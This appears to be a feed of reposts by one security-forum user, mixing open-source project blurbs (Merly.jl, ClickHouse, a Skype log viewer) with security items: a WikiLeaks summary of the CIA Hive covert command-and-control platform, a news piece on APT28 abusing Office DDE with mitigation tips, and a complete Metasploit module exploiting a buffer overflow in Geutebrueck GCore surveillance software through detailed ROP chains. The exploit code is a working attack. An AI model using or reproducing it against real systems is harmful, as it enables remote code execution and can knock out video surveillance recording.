    Merly.jl Micro framework for web programming in Julia. Merly is a micro framework for declaring routes and handling requests. Quickly creating web applications in Julia with minimal effort. Roadmap Below are some of the features that are planned to be added in future versions of Faker.jl once version 1.0 of the language is released. All contributions and suggestions are welcome !!!! Version 0.1.0 Julia version 1.0 syntax update Version 0.1.1 Implementation of verbose Version 0.1.2 Implementation of a websocket module Version 0.1.3 Performance improvement Version 0.1.4 Threads implementation Installing Pkg.add("Merly") #Release Pkg.clone("git://github.com/codeneomatrix/Merly.jl.git") #Development Example using Merly global u u="hello" server = Merly.app() @page "/" "Hello World!" @page "/hola/:usr" "<b>Hello {{usr}}!</b>" @route GET "/get/:data" begin "get this back: {{data}}" end @route POST "/post" begin "I did something!" end @route POST|PUT|DELETE "/" begin println("params: ",q.params) println("query: ",q.query) println("body: ",q.body) r.headers["Content-Type"]="text/plain" "I did something!" end Get("/data", (q,r)->(begin r.headers["Content-Type"]="text/plain" "$u data" end)) Post("/data", (q,r)->(begin println("params: ",q.params) println("query: ",q.query) println("body: ",q.body) r.headers["Content-Type"]="text/plain" global u="bye" "I did something!" end)) server.start("localhost", 8080) Features available in the current release Parameters dictionary @route GET "/get/:data" begin "get this back: "*q.params["data"] end url query dictionary @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="text/plain" "I did something! "*q.query["value1name"] end Dictionary of body Payload {"data1":"Hello"} @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="text/plain" "Payload data "*q.body["data1"] end Payload <Data> <Data1>Hello World!</Data1> </Data> @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="text/plain" "Payload data "*q.body["Data"]["Data1"] end Reply JSON @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="application/json" r.status = 200 #optional "{\"data1\":2,\"data2\":\"t\"}" end or @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="application/json" info=Dict() info["data1"]=2 info["data2"]="t" r.status = 200 #optional JSON.json(info) end Reply XML @route POST|PUT|DELETE "/" begin r.headers["Content-Type"]="application/xml" "<ListAllMyBucketsResult> <Buckets> <Bucket><Name>quotes</Name><CreationDate>2006-02-03T16:45:09.000Z</CreationDate></Bucket> <Bucket><Name>samples</Name><CreationDate>2006-02-03T16:41:58.000Z</CreationDate></Bucket> </Buckets> </ListAllMyBucketsResult>" end Reply File server = Merly.app("Path","load") #example: ("D:\\EXAMPLE\\src","*") defauld: (pwd(),"") @page "/" File("Index.html", r) Possible values of load "*" Load all the files located in the path, except what started with "." "jl","clj|jl|py" Extension in files that will not be exposed "" Any file, Default Not found message server.notfound("<!DOCTYPE html> <html> <head><title>Not found</title></head> <body><h1>404, Not found</h1></body> </html>") server.notfound("notfound.html") CORS server.use("CORS") Bonus If you forgot the MIME type of a file you can use the next instruction r.headers["Content-Type"]=mimetypes["file extension"] Download: Merly.jl-master.zip or git clone https://github.com/codeneomatrix/Merly.jl.git Source: https://github.com/codeneomatrix/Merly.jl
  19. Fi8sVrs
    An Introduction To React And The Surrounding Ecosystem In 2017 https://thejavascriptchronicles.com
  20. Fi8sVrs

    //dublu post

    Fi8sVrs posted a topic in Programare

    //dublu post P.S. cred ca e de la update
  21. Fi8sVrs
    skype-log-viewer Download and View Skype History Without Skype This program allows you to view all of your skype chat logs and then easily export them as text files. It correctly organizes them by conversation, and makes sure that group conversations do not get jumbled with one on one chats. Features Download Skype Logs Broken Database Support Change Export Format Organized by conversation in skype Download: skype-log-viewer-master.zip Source: https://github.com/lordgreggreg/skype-log-viewer
  22. Fi8sVrs
    Hive Today, 9 November 2017, WikiLeaks publishes the source code and development logs to Hive, a major component of the CIA infrastructure to control its malware. Hive solves a critical problem for the malware operators at the CIA. Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention. Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet. Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA. Hive can serve multiple operations using multiple implants on target computers. Each operation anonymously registers at least one cover domain (e.g. "perfectly-boring-looking-domain.com") for its own use. The server running the domain website is rented from commercial hosting providers as a VPS (virtual private server) and its software is customized according to CIA specifications. These servers are the public-facing side of the CIA back-end infrastructure and act as a relay for HTTP(S) traffic over a VPN connection to a "hidden" CIA server called 'Blot'. The cover domain delivers 'innocent' content if somebody browses it by chance. A visitor will not suspect that it is anything else but a normal website. The only peculiarity is not visible to non-technical users - a HTTPS server option that is not widely used: Optional Client Authentication. But Hive uses the uncommon Optional Client Authentication so that the user browsing the website is not required to authenticate - it is optional. But implants talking to Hive do authenticate themselves and can therefore be detected by the Blot server. Traffic from implants is sent to an implant operator management gateway called Honeycomb (see graphic above) while all other traffic go to a cover server that delivers the insuspicious content for all other users. Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities. The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town. In this way, if the target organization looks at the network traffic coming out of its network, it is likely to misattribute the CIA exfiltration of data to uninvolved entities whose identities have been impersonated. The documentation for Hive is available from the WikiLeaks Vault7 series. Source: wikileaks.org
  23. Fi8sVrs
    ClickHouse is an open source column-oriented database management system capable of real time generation of analytical data reports using SQL queries. Blazing Fast Linearly Scalable Hardware Efficient Fault Tolerant Feature Rich Highly Reliable Simple and Handy ClickHouse. Just makes you think faster. Run more queries in the same amount of time Test more hypotheses Slice and dice your data in many more new ways Look at your data from new angles Discover new dimensions Read more... Download: ClickHouse-master.zip or git clone https://github.com/yandex/ClickHouse.git Sources: https://clickhouse.yandex/ https://github.com/yandex/ClickHouse/
      • 1
      • Upvote
  24. Fi8sVrs
    This Metasploit module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'nokogiri' require 'open-uri' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', 'Description' => %q{ This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY). }, 'License' => MSF_LICENSE, 'Author' => [ 'Luca Cappiello', 'Maurice Popp' ], 'References' => [ ['EDB','41153'], ['CVE', '2017-11517'], ['URL','www.geutebrueck.com'] ], 'Platform' => 'win', 'Targets' => [ ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}], ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}] ], 'Payload' => { 'Space' => '2000' }, 'Privileged' => true, 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) register_options( [Opt::RPORT(13003)] ) end def fingerprint print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) statistics = @doc.css('modulestate') statistics.each do |x| if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') mytarget = targets[1] print_status("Vulnerable version detected: #{mytarget.name}") return Exploit::CheckCode::Appears, mytarget elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') mytarget = targets[2] print_status("Vulnerable version detected: #{mytarget.name}") return Exploit::CheckCode::Appears, mytarget end end print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') [Exploit::CheckCode::Unknown, nil] end def check fingerprint end def ropchain(target) rop = '' # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. stack_align = "\x43" * 16 if target.name.include? '1.3.8.42' print_status('Preparing ROP chain for target 1.3.8.42!') # 0x140cd00a9 | add rsp, 0x10 ; ret # This is needed because the next 16 bytes are sometimes messed up. overwrite = [0x140cd00a9].pack('Q<') # We have 40 bytes left to align our stack! # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations # and to restore it. # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. # 0x1404e5cbf: mov edx, esp ; ret stack_align << [0x1404e5cbf].pack('Q<') # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. # We pop -XXXXX as \xxxxxxxxx to rax # 0x14013db94 pop rax ; ret stack_align << [0x14013db94].pack('Q<') stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') # Our value is enough. # 0x1407dc547 | add rax,rdx ; ret stack_align << [0x1407dc547].pack('Q<') # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret stack_align << [0x140ce9ac0].pack('Q<') # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. # We want RCX to hold the value for VP Argument "Address of Shellcode" # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; rop << [0x140cc2234].pack('Q<') rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; # 0x1400ae2ae | POP RDX; RETN # 0x...1000 | Value for VP "Size of Memory" rop << [0x1400ae2ae].pack('Q<') rop << [0x0000000000000400].pack('Q<') # 0x14029dc6e: | POP R8; RET # 0x...40 | Value for VP "Execute Permissions" rop << [0x14029dc6e].pack('Q<') rop << [0x0000000000000040].pack('Q<') # 0x1400aa030 | POP R9; RET # 0x1409AE1A8 is the .data section of gcore rop << [0x1400aa030].pack('Q<') rop << [0x1409AE1A8].pack('Q<') # 0x140b5927a: xor rax, rax ; ret rop << [0x140b5927a].pack('Q<') # 0x1402ce220 pop rax ; ret # 0x140d752b8 | VP Stub IAT Entry rop << [0x1402ce220].pack('Q<') rop << [0x140d752b8].pack('Q<') # 0x1407c6b3b mov rax, qword [rax] ; ret ; rop << [0x1407c6b3b].pack('Q<') # 0x140989c41 push rax; ret rop << [0x140989c41].pack('Q<') # 0x1406d684d jmp rsp rop << [0x1406d684d].pack('Q<') [rop, overwrite, stack_align] elsif target.name.include? '1.4.2.37' print_status('Preparing ROP chain for target 1.4.2.37!') # 0x140cd9759 | add rsp, 0x10 ; ret # This is needed because the next 16 bytes are sometimes messed up. overwrite = [0x140cd9759].pack('Q<') # We have 40 bytes left to align our stack! # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations # and to restore it. # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. # 0x1404f213f: mov edx, esp ; ret stack_align << [0x1404f213f].pack('Q<') # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. # We pop -XXXXX as \xxxxxxxxx to rax # 0x14000efa8 pop rax ; ret stack_align << [0x14000efa8].pack('Q<') stack_align << [0xFFFFFFFFFFFFF061].pack('Q<') # Our value is enough. # 0x140cdfe65 | add rax,rdx ; ret stack_align << [0x140cdfe65].pack('Q<') # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. # 0x140cf3110 | mov rsp, rax ; ..... ; ret stack_align << [0x140cf3110].pack('Q<') # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. # We want RCX to hold the value for VP Argument "Address of Shellcode" # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; rop << [0x140ccb984].pack('Q<') rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; # 0x14008f7ec | POP RDX; RETN # 0x...1000 | Value for VP "Size of Memory" rop << [0x14008f7ec].pack('Q<') rop << [0x0000000000000400].pack('Q<') # 0x140a88f81: | POP R8; RET # 0x...40 | Value for VP "Execute Permissions" rop << [0x140a88f81].pack('Q<') rop << [0x0000000000000040].pack('Q<') # 0x1400aa030 | POP R9; RET # 0x... | Value for VP "Writeable location". Not sure if needed? # 0x140FB5000 is the .data section of gcore; let's test with this writable section... rop << [0x1400aa030].pack('Q<') rop << [0x140FB5000].pack('Q<') # 0x140ccea2f: xor rax, rax ; et rop << [0x140ccea2f].pack('Q<') # 0x14000efa8 pop rax ; ret # 0x140d83268 | VP Stub IAT Entry rop << [0x14000efa8].pack('Q<') rop << [0x140d83268].pack('Q<') # 0x14095b254 mov rax, qword [rax] ; ret ; rop << [0x14095b254].pack('Q<') # 0x140166c46 push rax; ret rop << [0x140166c46].pack('Q<') # 0x140cfb98d jmp rsp rop << [0x140cfb98d].pack('Q<') [rop, overwrite, stack_align] else print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') end end def exploit if target['auto'] checkcode, target = fingerprint fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' target_rop, target_overwrite, target_stack_align = ropchain(target) else print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') print_status("Selected version: #{self.target.name}") target_rop, target_overwrite, target_stack_align = ropchain(self.target) end begin connect print_status('Crafting Exploit...') exploit = 'GET /' exploit << "\x41" * 200 exploit << target_rop exploit << payload.encoded exploit << "\x41" * 1823 exploit << target_overwrite exploit << target_stack_align print_status('Exploit ready for sending...') sock.put(exploit, 'Timeout' => 20) print_status('Exploit sent!') buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}") ensure print_status('Closing socket.') disconnect end end end Source: https://packetstormsecurity.com/files/144928/Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow.html
  25. Fi8sVrs
    Cybercriminals, including state-sponsored hackers, have started actively exploiting a newly discovered Microsoft Office vulnerability that Microsoft does not consider as a security issue and has already denied to patch it. Last month, we reported how hackers could leverage a built-in feature of Microsoft Office feature, called Dynamic Data Exchange (DDE), to perform code execution on the targeted device without requiring Macros enabled or memory corruption. DDE protocol is one of the several methods that Microsoft uses to allow two running applications to share the same data. The protocol is being used by thousands of apps, including MS Excel, MS Word, Quattro Pro, and Visual Basic for one-time data transfers and for continuous exchanges for sending updates to one another. Soon after the details of DDE attack went public, several reports emerged about various widespread attack campaigns abusing this technique in the wild to target several organisations with malware. Now, for the first time, this DDE attack technique has been found leveraging by an Advanced Persistent Threat (APT) hacking group—APT28, which is well known as Fancy Bear and is widely believed to be backed by the Russian government. Russian Hackers Using New York Terror Attack to Lure Victims While analyzing a new spear phishing campaign, security researchers discovered that the Fancy Bear hackers have been leveraging the DDE vulnerability since late October, according to a recent report published Tuesday by McAfee researchers. The campaign involved documents referencing the recent terrorist attack in New York City in an attempt to trick victims into clicking on the malicious documents, which eventually infects their systems with malware. Since DDE is a Microsoft's legitimate feature, most antivirus solutions don't flag any warning or block the documents with DDE fields. Therefore, anyone who clicks on the malicious attachment (with names like SabreGuard2017.docx or IsisAttackInNewYork.docx) inadvertently runs malicious code on his/her computer without any restriction or detection. Once opened, the document runs contacts a command-and-control server to install the first stage of the malware called Seduploader on victims' machines using PowerShell commands. Seduploader then profiles prospective victims by pulling basic host information from the infected system to the hackers. If the system is of interest, the attackers later install a more fully featured piece of spyware—X-Agent and Sedreco. This is not first malware campaign that has been spotted abusing the DDE attack technique. Soon after the details of DDE attack technique went public, Cisco's Talos threat research group uncovered an attack campaign that was actively exploiting this attack technique to target several organisations with a fileless remote access trojan called DNSMessenger. Late last month, researchers discovered a campaign that spread Locky ransomware and TrickBot banking trojan via Word documents that leveraged the DDE technique. Another separate malware spam campaign discovered by security researchers also found distributing Hancitor malware (also known as Chanitor and Tordal) using Microsoft Office DDE exploit. Protection Against DDE Malware Attacks Since Microsoft does not provide any protection against such attacks, you can easily prevent yourself from falling victim to any malicious document abusing the Microsoft's DDE feature by disabling it entirely. If you use Microsoft Word 2016 or Microsoft Excel 2016, go to Options → Advanced, and then remove the checkmark from "Update automatic links at open" which is listed under the general group on the page. In MS Excel, you can also consider checking "Ignore other applications that use Dynamic Data Exchange (DDE)." Moreover, Disable DDEAuto is a Registry file maintained on GitHub that disables the "update links" as well as "embedded files" functionality in MS Office documents when run. You can detect Office documents abusing the DDE feature via a set of YARA rules in Office Open XML files published by the researchers at NVISO Labs. However, the best way to protect yourself from such malware attacks is always to be suspicious of uninvited documents sent via emails and never click on links inside those documents unless adequately verifying the source. Via thehackernews.com
×
×
  • Create New...